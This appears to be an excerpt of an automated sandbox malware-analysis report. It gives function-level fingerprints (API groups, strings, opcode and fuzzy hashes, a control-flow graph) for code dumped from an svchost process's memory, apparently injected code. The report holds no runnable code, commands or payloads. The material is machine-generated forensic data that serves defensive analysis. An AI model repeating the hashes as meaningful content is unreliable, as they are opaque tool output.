                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 177c773e1e7dfd8a5ed4220e107583d9124d25de35631a206f5b1d63bb2b8b62
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: AE81D021B10241A6FA629BFDB84D3596290B7457C0FD84125FA1847BAEEF38C8E7C730

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 536 2295d569804-2295d569842 537 2295d569848-2295d56984b 536->537 538 2295d569933 536->538 539 2295d569935-2295d569951 537->539 540 2295d569851 537->540 538->539 541 2295d569854 540->541 542 2295d56992b 541->542 543 2295d56985a-2295d569869 541->543 542->538 544 2295d56986b-2295d56986e 543->544 545 2295d569876-2295d569895 LoadLibraryExW 543->545 546 2295d56990d-2295d56991c call 2295d573090 544->546 547 2295d569874 544->547 548 2295d5698ed-2295d569902 545->548 549 2295d569897-2295d5698a0 call 2295d573080 545->549 546->542 556 2295d56991e-2295d569929 546->556 552 2295d5698e1-2295d5698e8 547->552 548->546 550 2295d569904-2295d569907 FreeLibrary 548->550 557 2295d5698cf-2295d5698d9 549->557 558 2295d5698a2-2295d5698b7 call 2295d56ad28 549->558 550->546 552->541 556->539 557->552 558->557 561 2295d5698b9-2295d5698cd LoadLibraryExW 558->561 561->548 561->557
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: dc85a75abc711fb33c37209140bc320e9bd677249494bd85118dde110398db05
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: 7F318431312650F1FE139B9AB4087996394B749BA0F994525FE2D4B39CEF38C4E6C720

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: 4d72f3105d719a63821fe754c6d7dd19382ae42c4a80501f2782a2bd43ef267e
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: D611C431314B5096F7518B8AE84871977A4F388FF4FA00225FE6E87798CF38C5A58750
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: af2c629c012e9adac4229a14eacd238263cdae950b7cfdce04b58a675a87641c
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: 39D18C76208B88D2DA71DB59F49835A77A0F3C8B84F540216FA8D47BA9DF3CC592CB10
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: 0933069cf0e1490756b4d83f88b27466ff5f6f5a4cb0ffb68886df60d643d9f4
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: 9B317021701B55A2FB56DF9AE84866967A0FB46BD4F888120EF4907B58EF38C4F3C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: b77691d71fa82fd0f0c879284ef49ff13d48701d03fc163ecb9bb793dd36b294
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: A3016D31300A41A6FB11DB96A45C76963A1F788FD0F984435EE9A43768DE3CC9D6C350
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: 4cbb42e127e58c53af39564505926530af553a3f5e6320148cbfec8e0bb101a7
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: 73118475301741A2FB269BA9F40D75663A0BB58BD5F940428EE590775CEF3CC0AAC720
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: a23fc60485f0c380312dd1d7e3229ddd13c337a1fb1e7acd51aa5a4cffb3b8c1
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: FF51B032311640EBEB16DF99F44CB593395F344B98FA08120EA164B78CEB35D9D2CB20
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: f5150f63948c35c53ac81c47d062bafe7da57ac8993b4762ae4789a995be2596
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 4B319E32310680E6E716DF59F84C71937A5F748BD8FA58114FE5A0B749DB38C9A2CB24
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: 7fe597ed2677da22335033f5e41d13b9115a435c11a0163dc208282d719bda32
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: 3DF0A422300641A2FB318BA9F4987696760F754BD8FD48020EA484A96CDE2CC6DAC710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: cc02822e64b4b43800a6494ef65c193e0582d1c11f55bb9244bc4ef4555baaa7
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: D5F08260304B80A1FA118B9BF90C1196221EB48FE0F988131FF6A07B2CCE2CC4E7C310
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: 7eacd118fc183eabda9bc05fae293b562405534fa16fb932430ef6238a9dd696
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 07F01261311644B1FF578BE9F88C36923A0AB48BD1FA42019F61B45578DF38C4EAC720
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: cfd658ea2cdb61fb7e280d60c831be61231c77804aebe3abdfbc6e827c43d649
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: 5C02C932219B8096E7A1CF99F49835AB7A0F3C5B94F504115FA8E87BA8DF7CC495CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: d052b1c46727c19f43efd8b7e0256fe62ff6537c43c5cc0f5a60b0815a9477fd
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: DF81AC22B10650A9FB529BEDD8487AD27F0B754BD8FE44116FA0A5369ADB3484E3C330
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: 2e75c9d66f1ae270a0ccae9c8ac8bc829f1075925da208cb5abb1be85d45c1d2
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: 0861BC36619B44D6E7618B99F45831A77A0F3C8784FA00116FA8D47BACDB7CC5A2CF10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: bba08c75069eb4ae0592ef4de81ae1046e0182a33f185f0024a95fadd8ac3b44
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: D811C622B5FE1461F66611EEE47EB6D10406B553B4FC80624FA7646FDE8B188CE34127
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: d00fc3ff6a8a2feef3ba3802974e7caae69bdcfd36a4a00ff7f8a0dc82fe5ffb
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: B811A922B56E0121F69A11ECE85E76910517B643F4FF46625FE77063DF8B548CE34134
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: d9f4ad6a2dca8628e2ea8d3bc8c82d10d9319df7426a2d87402df6b7559ee48c
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 6A118E2A705B4092FB169BA9F41836967B0F788B90F980029EF9907798EF3DC596C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: 01f5ff1fb9b5be4ee618e3ccf9128f27f383dc818439f1e97fcf397e8e08a064
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: FA51D772712600ABDB1ACF6DD448B193B95FB54B98FD18124FA164774CDB34C8E2C726
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: 54cef47eacf2fdafb8c6ab38e85dc36da4425aedc6f44c8e3f84c76bb3317c6d
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: 9931AF72311750F6E71ADF69E8487193BA4FB40B98F958014FE5A4774CCB38C9A2C726
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction ID: c4733d2196c257afb400b46f69818893e68172c46ec69e2d92d4166db854acf0
                                            • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction Fuzzy Hash: 1B118132614F84E2E751CFAAF80825A7360F78ABD0F544029EB9A03718DF38C0A2C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: a24aa7111778482f37dc46ad5fb1c8f263fadef3bef945fd79dc8ec058fcd767
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: 8071E33230078162EB669FADA9583AE6790F785BC4FC44026FE4943B8DDE34C9E6C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: bd4259202f19020f7acc39bfef5f09d3a58e72965e4eacd60525bfbc4f07c94f
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: 00511A3230478162FA369EADB15C3AA6651F385784FD40025FF9A07B9DDE35C4A7CB60
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: 1165dc7b861e08b73f9ddd0575140fde1ab06b2083633807e1a2c32ed641343a
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: BD41A372314A80A5EB619F6DE4593AAA7A0F3887D4F904025FE4D87798EF3CC592CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: b6ec0e3822f44f4974ba45c3b4ad031aafea858d39a4be114183cc4bad7c1915
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: 4211F736708B9096DB618B5AB44429AB7A4F789BD0F944126EACD83B59DF38C4A1CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: 4206efeffc6ca744a8ee94f67e3cfb921d441615101c791e442dbefb7a6d9b88
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: 4B111F32214B8092EB618F59F44425977A5F788B98F584225EF9D0B768DF38C5A6CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: ec8b7fb54daf39842dfd8d2727fb0fe77053afe0efa68e6c8063deca0273b5df
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: B0F08921710790A1FB175BD9F4485556321A788BD0FE85416FA5903B5CCE38C5F6C720
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2967484419.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d530000_svchost.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: 422ad1516d5ea61ae22fb89c8dd9457b7e4e0eded744485d61e6f54fbbe180c5
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: 58E09221308941B2EA079FDDF44C2E472619F94740FE9A021F9190625EDE3CC8F78361
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: b9f947fcaab863fd034a458c7f8bf2b871c006b774413eff4daedb7773ba97b7
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: F9E0E561310640B1FE175BD9F84D6A56262AB887C0FE89526F6590635DCE38C8F7C720
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: d49fae6660e039afaef4af6e963e2af9471fcf4aa3129fb68c4f1e8e86d27fa2
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: B7218322705B8095EF128F9DF40866AF7A0FB84BA4F954120EE8C47B18EE78C5A3C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2968624026.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2295d560000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: 6d1deb667d001a1ddb2ab59ec8eef6bc1084919400beab451ae0fb92074640fd
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 1EE06D71711600D6F7058FAAD8083493BE1FB89FA1F98C024CA1907354DF7D84EAC760

                                            Execution Graph

                                            Execution Coverage:0.8%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:69
                                            Total number of Limit Nodes:3
